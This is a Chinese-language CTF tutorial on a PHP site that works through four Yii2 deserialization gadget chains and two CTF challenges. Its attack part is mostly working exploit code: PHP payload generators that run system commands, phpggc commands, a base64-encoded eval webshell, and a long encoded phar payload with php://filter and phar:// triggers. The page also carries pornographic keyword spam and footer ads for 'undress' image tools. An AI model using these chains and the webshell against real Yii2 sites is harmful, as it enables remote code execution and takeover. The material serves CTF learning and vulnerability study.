国产av日韩一区二区三区精品,成人性爱视频在线观看,国产,欧美,日韩,一区,www.成色av久久成人,2222eeee成人天堂

Table of Contents
Yii2<2.0.38反序列化
鏈一
鏈二
鏈三
鏈四
phpggc
CTF題目
[HMBCTF 2021]framework
[CISCN2021 Quals]filter
Home PHP Framework YII A few selected CTF exercises will help you learn the yii2 framework!

A few selected CTF exercises will help you learn the yii2 framework!

Feb 23, 2022 am 10:33 AM
yii2

本篇文章帶大家了解yii2框架,分享幾道CTF習題,通過它們來學習yii2框架,希望對大家有所幫助。

A few selected CTF exercises will help you learn the yii2 framework!

Yii是一套基于組件、用于開發(fā)大型 Web 應用的高性能 PHP 框架,Yii2 2.0.38 之前的版本存在反序列化漏洞,程序在調用unserialize()時,攻擊者可通過構造特定的惡意請求執(zhí)行任意命令,本篇就分析一下yii2利用鏈以及如何自己去構造payload,并結合CTF題目去學習yii2框架

Yii2<2.0.38反序列化

安裝:在 https://github.com/yiisoft/yii2/releases下載2.0.37的版本

然后在 yii-basic-app-2.0.37\basic\config\web.php里面往cookieValidationKey隨意給點值,運行 php yii serve,新建一個控制器

yii-basic-app-2.0.37\basic\controllers\TestController.php

<?php
namespace app\controllers;
use yii\web\Controller;

class TestController extends Controller{
    public function actionTest($name){
        return unserialize($name);
    }
}

就可以進行測試了

?r=test/test&name=

鏈一

鏈的入口在

yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2\db\BatchQueryResult.php

public function __destruct()
    {
        // make sure cursor is closed
        $this->reset();
    }

跟進$this->reset();

public function reset()
    {
        if ($this->_dataReader !== null) {
            $this->_dataReader->close();
        }

這里的$this->_dataReader可控,并調用了close()方法,那么可以找到一個類不存在close()方法,但存在__call方法就可以調用他了

yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2-gii\src\Generator.php

public function __call($method, $attributes)
    {
        return $this->format($method, $attributes);
    }

這里的$methodclose$attributes為空,繼續(xù)跟進format

public function format($formatter, $arguments = array())
    {
        return call_user_func_array($this->getFormatter($formatter), $arguments);
    }

跟進getFormatter

public function getFormatter($formatter)
    {
        if (isset($this->formatters[$formatter])) {
            return $this->formatters[$formatter];
        }

似曾相識的代碼,laravel5.8某條鏈就出現(xiàn)過,這里$this->formatters可控,也就是$this->getFormatter($formatter)這這個可控,但是$arguments的值我們無法控制,值為空

到這里可以執(zhí)行phpinfo

<?php
namespace yii\db{
    class BatchQueryResult{
        private $_dataReader;
        public function __construct($_dataReader) {
            $this->_dataReader = $_dataReader;
        }
    }
}
namespace Faker{
    class Generator{
        protected $formatters = array();
        public function __construct($formatters) {
            $this->formatters = $formatters;
        }
    }
}
namespace {
    $a = new Faker\Generator(array(&#39;close&#39;=>&#39;phpinfo&#39;));
    $b = new yii\db\BatchQueryResult($a);
    print(urlencode(serialize($b)));
}

但是我們想要rce的話,還要在yii2中已有的無參方法中進行挖掘

這里我們可以使用正則匹配直接搜索含有call_user_function的無參函數(shù)

call_user_func\(\$this->([a-zA-Z0-9]+), \$this->([a-zA-Z0-9]+)

然后找到下面兩個都比較好用

yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2\rest\IndexAction.php
public function run()
    {
        if ($this->checkAccess) {
            call_user_func($this->checkAccess, $this->id);
        }

        return $this->prepareDataProvider();
    }

yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2\rest\CreateAction.php
public function run()
{
    if ($this->checkAccess) {
        call_user_func($this->checkAccess, $this->id);
}

這里的$this->checkAccess$this->id都是我們可控的

所以直接構造就行了

<?php
namespace yii\db{
    class BatchQueryResult{
        private $_dataReader;
        public function __construct($_dataReader) {
            $this->_dataReader = $_dataReader;
        }
    }
}
namespace Faker{
    class Generator{
        protected $formatters = array();
        public function __construct($formatters) {
            $this->formatters = $formatters;
        }
    }
}
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;
        public function __construct($checkAccess,$id){
            $this->checkAccess = $checkAccess;
            $this->id = $id;
        }
    }
}
namespace {
    $c = new yii\rest\CreateAction(&#39;system&#39;,&#39;whoami&#39;);
    $b = new Faker\Generator(array(&#39;close&#39;=>array($c, &#39;run&#39;)));
    $a = new yii\db\BatchQueryResult($b);
    print(urlencode(serialize($a)));
}

A few selected CTF exercises will help you learn the yii2 framework!

鏈二

這個是yii2 2.0.37的另外一條鏈

起點和鏈一相同,是BatchQueryResult類的__destruct,然后是$this->_dataReader->close(),但是這里不找__call,我們?nèi)フ掖嬖?code>close方法的類

找到yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2\web\DbSession.php

class DbSession extends MultiFieldSession
{
...
public function close()
    {
        if ($this->getIsActive()) {
            // prepare writeCallback fields before session closes
            $this->fields = $this->composeFields();

這里跟進$this->composeFields()

abstract class MultiFieldSession extends Session
{
protected function composeFields($id = null, $data = null)
    {
        $fields = $this->writeCallback ? call_user_func($this->writeCallback, $this) : [];

這里$this->writeCallback可控,$this是一個對象,所以這里調phpinfo的話應該不行,不過可以續(xù)上鏈一的run方法(即那個無參的方法)

這里直接構造即可

<?php
namespace yii\db{
    class BatchQueryResult{
        private $_dataReader;
        public function __construct($_dataReader) {
            $this->_dataReader = $_dataReader;
        }
    }
}
namespace yii\web{
    class DbSession{
        public $writeCallback;
        public function __construct($writeCallback) {
            $this->writeCallback = $writeCallback;
        }
    }
}
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;
        public function __construct($checkAccess,$id){
            $this->checkAccess = $checkAccess;
            $this->id = $id;
        }
    }
}
namespace {
    $c = new yii\rest\CreateAction(&#39;system&#39;,&#39;whoami&#39;);
    $b = new yii\web\DbSession(array($c, &#39;run&#39;));
    $a = new yii\db\BatchQueryResult($b);
    print(urlencode(serialize($a)));
}

鏈三

我們可以在yii2 2.0.38commit看到他加了一個__wakeup

A few selected CTF exercises will help you learn the yii2 framework!

這里限制了鏈一的起點BatchQueryResult無法使用,后面的__call的鏈沒有被破壞,所以我們繼續(xù)尋找一個__destruct

yii-basic-app-2.0.37\basic\vendor\codeception\codeception\ext\RunProcess.php

public function __destruct()
    {
        $this->stopProcess();
    }

這里繼續(xù)跟進stopProcess

public function stopProcess()
    {
        foreach (array_reverse($this->processes) as $process) {
            /** @var $process Process  **/
            if (!$process->isRunning()) {
                continue;
            }

這里的$this->processes可控,所以可以利用$process->isRunning()來進行觸發(fā)__call

后面的利用就和鏈一相同了

<?php
namespace Codeception\Extension{
    class RunProcess{
        private $processes = [];
        public function __construct($processes) {
            $this->processes[] = $processes;
        }
    }
}
namespace Faker{
    class Generator{
        protected $formatters = array();
        public function __construct($formatters) {
            $this->formatters = $formatters;
        }
    }
}
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;
        public function __construct($checkAccess,$id){
            $this->checkAccess = $checkAccess;
            $this->id = $id;
        }
    }
}
namespace {
    $c = new yii\rest\CreateAction(&#39;system&#39;,&#39;whoami&#39;);
    $b = new Faker\Generator(array(&#39;isRunning&#39;=>array($c, &#39;run&#39;)));
    $a = new Codeception\Extension\RunProcess($b);
    print(urlencode(serialize($a)));
}

鏈四

同樣的先找__destruct

yii-basic-app-2.0.37\basic\vendor\swiftmailer\swiftmailer\lib\classes\Swift\KeyCache\DiskKeyCache.php

public function __destruct()
    {
        foreach ($this->keys as $nsKey => $null) {
            $this->clearAll($nsKey);
        }
    }

這里$nsKey可控,跟進clearAll

public function clearAll($nsKey)
    {
        if (array_key_exists($nsKey, $this->keys)) {
            foreach ($this->keys[$nsKey] as $itemKey => $null) {
                $this->clearKey($nsKey, $itemKey);
            }
            if (is_dir($this->path.&#39;/&#39;.$nsKey)) {
                rmdir($this->path.&#39;/&#39;.$nsKey);
            }
            unset($this->keys[$nsKey]);
        }
    }

這里沒有觸發(fā)__call的地方,但是存在字符串的拼接,可以觸發(fā)__toString

隨便找找就找到了yii-basic-app-2.0.37\basic\vendor\codeception\codeception\src\Codeception\Util\XmlBuilder.php

public function __toString()
{
    return $this->__dom__->saveXML();
}

同樣用他去觸發(fā)__call

<?php
namespace {
    class Swift_KeyCache_DiskKeyCache{
        private $path;
        private $keys = [];
        public function __construct($path,$keys) {
            $this->path = $path;
            $this->keys = $keys;
        }
    }
}
namespace Codeception\Util{
    class XmlBuilder{
        protected $__dom__;
        public function __construct($__dom__) {
            $this->__dom__ = $__dom__;
        }
    }
}
namespace Faker{
    class Generator{
        protected $formatters = array();
        public function __construct($formatters) {
            $this->formatters = $formatters;
        }
    }
}
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;
        public function __construct($checkAccess,$id){
            $this->checkAccess = $checkAccess;
            $this->id = $id;
        }
    }
}
namespace {
    $c = new yii\rest\CreateAction(&#39;system&#39;,&#39;whoami&#39;);
    $b = new Faker\Generator(array(&#39;saveXML&#39;=>array($c,&#39;run&#39;)));
    $a = new Codeception\Util\XmlBuilder($b);
    $d = new Swift_KeyCache_DiskKeyCache($a,array(&#39;kawhi&#39;=>&#39;kawhi&#39;));
    print(urlencode(serialize($d)));
}

A few selected CTF exercises will help you learn the yii2 framework!

phpggc

使用./phpggc -l yii2可以看到有兩條yii2的鏈

A few selected CTF exercises will help you learn the yii2 framework!

可以使用如下命令快速得到鏈,-uurl編碼

./phpggc Yii2/RCE1 system id -u

phpggc的鏈二的終點是一個eval,所以這里可以直接寫shell-bbase64編碼

./phpggc Yii2/RCE2 &#39;file_put_contents("shell.php",base64_decode("PD9waHAgZXZhbCgkX1BPU1RbMV0pPz4="));&#39; -b

CTF題目

[HMBCTF 2021]framework

把題目附件解壓,看到html\controllers\SiteController.php

class SiteController extends Controller
{
    public function actionAbout($message = &#39;Hello&#39;)
    {
        $data = base64_decode($message);
        unserialize($data);
    }

這里可以這樣傳參

?r=site/about&message=

拿鏈一打了一下,發(fā)現(xiàn)一下system等函數(shù)被ban

A few selected CTF exercises will help you learn the yii2 framework!

這里用phpggc yii2的鏈二寫一個shell進去,然后用蟻劍的 apache/moddisable,運行 /readflag 即可獲取 flag

[CISCN2021 Quals]filter

據(jù)說這是配置文件里面的重要內(nèi)容,或許對你有用??!

        &#39;log&#39; => [
            &#39;traceLevel&#39; => YII_DEBUG ? 0 : 0,
            &#39;targets&#39; => [
                [
                    &#39;class&#39; => &#39;yii\log\FileTarget&#39;,
                    &#39;levels&#39; => [&#39;error&#39;],
                    &#39;logVars&#39; => [],
                ],
            ],
        ],

看到附件的SiteController.php就改了這個地方

public function actionIndex()
    {
        $file = Yii::$app->request->get(&#39;file&#39;);
        $res = file_get_contents($file);
        file_put_contents($file,$res);
        return $this->render(&#39;index&#39;);
    }

yii框架的runtime/logs目錄下有一個app.log

看一下依賴發(fā)現(xiàn)monolog符合

"require": {
        "php": ">=5.6.0",
        "yiisoft/yii2": "~2.0.14",
        "yiisoft/yii2-bootstrap": "~2.0.0",
        "yiisoft/yii2-swiftmailer": "~2.0.0 || ~2.1.0",
    "monolog/monolog":"1.19"
    },

首先清空日志文件

?file=php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../runtime/logs/app.log

phpggc生成

php -d&#39;phar.readonly=0&#39; ./phpggc Monolog/RCE1 "phpinfo" "1" --phar phar -o php://output | base64 -w0 | python -c "import sys;print(&#39;&#39;.join([&#39;=&#39; + hex(ord(i))[2:].zfill(2) + &#39;=00&#39; for i in sys.stdin.read()]).upper())"

寫入日志,注意最后面要加個字符a

/?file==50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=71=00=39=00=41=00=67=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=6D=00=41=00=67=00=41=00=41=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=46=00=4E=00=35=00=63=00=32=00=78=00=76=00=5A=00=31=00=56=00=6B=00=63=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=32=00=39=00=6A=00=61=00=32=00=56=00=30=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=49=00=35=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=35=00=76=00=62=00=47=00=39=00=6E=00=58=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=4A=00=63=00=51=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=53=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=36=00=4E=00=7A=00=70=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=37=00=54=00=7A=00=6F=00=79=00=4F=00=54=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=45=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=63=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=30=00=34=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=55=00=32=00=6C=00=36=00=5A=00=53=00=49=00=37=00=61=00=54=00=6F=00=74=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=6B=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=69=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=78=00=4F=00=69=00=49=00=78=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=55=00=36=00=49=00=6D=00=78=00=6C=00=64=00=6D=00=56=00=73=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=31=00=39=00=63=00=7A=00=6F=00=34=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=73=00=5A=00=58=00=5A=00=6C=00=62=00=43=00=49=00=37=00=54=00=6A=00=74=00=7A=00=4F=00=6A=00=45=00=30=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=70=00=62=00=6D=00=6C=00=30=00=61=00=57=00=46=00=73=00=61=00=58=00=70=00=6C=00=5A=00=43=00=49=00=37=00=59=00=6A=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=78=00=70=00=62=00=57=00=6C=00=30=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=4D=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=42=00=79=00=62=00=32=00=4E=00=6C=00=63=00=33=00=4E=00=76=00=63=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=59=00=33=00=56=00=79=00=63=00=6D=00=56=00=75=00=64=00=43=00=49=00=37=00=61=00=54=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=63=00=47=00=68=00=77=00=61=00=57=00=35=00=6D=00=62=00=79=00=49=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=45=00=7A=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=69=00=64=00=57=00=5A=00=6D=00=5A=00=58=00=4A=00=54=00=61=00=58=00=70=00=6C=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=45=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=68=00=4F=00=6A=00=49=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=7A=00=4F=00=6A=00=45=00=36=00=49=00=6A=00=45=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=54=00=6F=00=69=00=62=00=47=00=56=00=32=00=5A=00=57=00=77=00=69=00=4F=00=30=00=34=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=67=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=78=00=6C=00=64=00=6D=00=56=00=73=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=6C=00=75=00=61=00=58=00=52=00=70=00=59=00=57=00=78=00=70=00=65=00=6D=00=56=00=6B=00=49=00=6A=00=74=00=69=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=78=00=4E=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=54=00=47=00=6C=00=74=00=61=00=58=00=51=00=69=00=4F=00=32=00=6B=00=36=00=4C=00=54=00=45=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=48=00=4A=00=76=00=59=00=32=00=56=00=7A=00=63=00=32=00=39=00=79=00=63=00=79=00=49=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=4A=00=6A=00=64=00=58=00=4A=00=79=00=5A=00=57=00=35=00=30=00=49=00=6A=00=74=00=70=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=4A=00=77=00=61=00=48=00=42=00=70=00=62=00=6D=00=5A=00=76=00=49=00=6A=00=74=00=39=00=66=00=58=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=47=00=59=00=61=00=33=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=47=00=59=00=61=00=33=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=64=00=47=00=56=00=7A=00=64=00=4A=00=41=00=61=00=47=00=73=00=75=00=53=00=31=00=47=00=68=00=54=00=49=00=2B=00=6B=00=4B=00=58=00=33=00=45=00=68=00=2B=00=4D=00=44=00=71=00=54=00=76=00=6E=00=6F=00=41=00=67=00=41=00=41=00=41=00=45=00=64=00=43=00=54=00=55=00=49=00=3D=00a

保留phar的內(nèi)容

/?file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../runtime/logs/app.log

最后用phar協(xié)議打一下

/?file=phar://../runtime/logs/app.log/test.txt

A few selected CTF exercises will help you learn the yii2 framework!

然后在根目錄找到This_is_flaaagggg

然后用這個找一下flag即可

php -d&#39;phar.readonly=0&#39; ./phpggc Monolog/RCE1 "system" "cat /This_is_flaaagggg" --phar phar -o php://output | base64 -w0 | python -c "import sys;print(&#39;&#39;.join([&#39;=&#39; + hex(ord(i))[2:].zfill(2) + &#39;=00&#39; for i in sys.stdin.read()]).upper())"

本文涉及相關實驗:PHP反序列化漏洞實驗 (通過本次實驗,大家將會明白什么是反序列化漏洞,反序列化漏洞的成因以及如何挖掘和預防此類漏洞。

相關文章教程推薦:《yii框架教程

The above is the detailed content of A few selected CTF exercises will help you learn the yii2 framework!. For more information, please follow other related articles on the PHP Chinese website!

Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undress AI Tool

Undress AI Tool

Undress images for free

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Clothoff.io

Clothoff.io

AI clothes remover

Video Face Swap

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Tools

Notepad++7.3.1

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

SublimeText3 Mac version

God-level code editing software (SublimeText3)

How do I configure a Yii widget? How do I configure a Yii widget? Jun 18, 2025 am 12:01 AM

ToconfigureaYiiwidget,youcallitwithaconfigurationarraythatsetspropertiesandoptions.1.Usethesyntax\\yii\\widgets\\ClassName::widget($config)inyourview.2.Definethe$configarraywithkeysmatchingthewidget’spublicproperties.3.Somewidgetssupportnestedarraysf

How do I install Yii on my operating system (Windows, macOS, Linux)? How do I install Yii on my operating system (Windows, macOS, Linux)? Jun 17, 2025 am 09:21 AM

To install the Yii framework, you need to configure PHP and Composer according to different operating systems. The specific steps are as follows: 1. You need to manually download PHP and configure environment variables on Windows, then install Composer, use commands to create a project and run a built-in server; 2. It is recommended to use Homebrew to install PHP and Composer, then create a project and start a development server; 3. Linux (such as Ubuntu) install PHP, extensions and Composer through apt, then create a project and deploy a formal environment with Apache or Nginx. The main differences between different systems are in the environment construction stage. Once PHP and Composer are ready, the subsequent processes are consistent. Note

How do I display validation errors in a form? How do I display validation errors in a form? Jun 19, 2025 am 12:02 AM

It is crucial to clearly display verification errors when the user submits the form information incorrectly or missing. 1. Use inline error messages to directly display specific errors next to the relevant fields, such as "Please enter a valid email address", rather than general prompts; 2. Mark the problem fields visually by red borders, background colors or warning icons to enhance readability; 3. When the form is long or the structure is complex, display a click-through summary of the error that can be clicked and jumped at the top, but it needs to be used in conjunction with inline messages; 4. Enable real-time verification in the appropriate situation, and instant feedback when the user enters or leaves the field, such as checking the email format or password strength, but avoiding prompting too early before the user submits. These methods can effectively guide users to quickly correct input errors and improve the form filling experience.

Top Skills Every Yii Framework Developer Needs Top Skills Every Yii Framework Developer Needs Jun 20, 2025 am 12:03 AM

Key skills to become a Yii framework developer include: 1) proficient in PHP and object-oriented programming (OOP), 2) understand MVC architecture, 3) proficient in using Yii's ActiveRecord, 4) familiar with Yii's Gii tools, 5) master RESTful API development, 6) possess front-end integration skills, 7) master debugging and performance optimization, 8) continuous learning and community participation. These skills combined can help developers work efficiently in the Yii framework.

How do I create forms in Yii? How do I create forms in Yii? Jun 23, 2025 am 12:03 AM

The core process of creating a form in the Yii framework includes four steps: 1. Create a model class, define fields and verification rules; 2. Process the form submission and verification logic in the controller; 3. Render form elements in the view using ActiveForm; 4. Pay attention to CSRF protection, layout and style configuration. The model class sets the required items and data formats through the rules() method. The controller uses load() and validate() to process the submitted data. The view uses ActiveForm to automatically generate input boxes with labels and error prompts, and can customize the layout and styles, thereby achieving a complete form system.

Yii vs. Laravel: Choosing the Right PHP Framework for Your Project Yii vs. Laravel: Choosing the Right PHP Framework for Your Project Jul 02, 2025 am 12:26 AM

The choice of Yii or Laravel depends on project requirements and team expertise. 1) Yii is suitable for high performance needs and has a lightweight structure. 2) Laravel provides rich functions, is developer-friendly and suitable for complex applications. Both are scalable, but Yii is easier to modular, while Laravel community is more resourceful.

How do I use the beforeAction() and afterAction() methods in a controller? How do I use the beforeAction() and afterAction() methods in a controller? Jul 02, 2025 am 12:03 AM

beforeAction() is used in Yii2 to run logic before the controller action is executed. If permission checks or requests modification, it must return true or parent class call to continue execution; afterAction() is run after the action is executed and before the response is sent, which is suitable for output modification or logging. 1.beforeAction() is run before the action is executed, and can be used for user permission verification. For example, redirecting the unlogged user to the login page, you need to return parent::beforeAction($action) or true to continue the process, otherwise the action execution will be prevented; 2. You can skip the check of a specific action by checking $action->id; 3. AfterAc

Is Yii developers a job with future? Is Yii developers a job with future? Jun 22, 2025 am 12:09 AM

Yii developers' career prospects still exist, but require diversified skills. 1) Yii still has demand in enterprise applications, but the market competition is fierce. 2) Yii skills can be transferred to other PHP frameworks. 3) Yii community has small support but sufficient resources. 4) Improve career flexibility by learning other frameworks and keeping Yii updated.

See all articles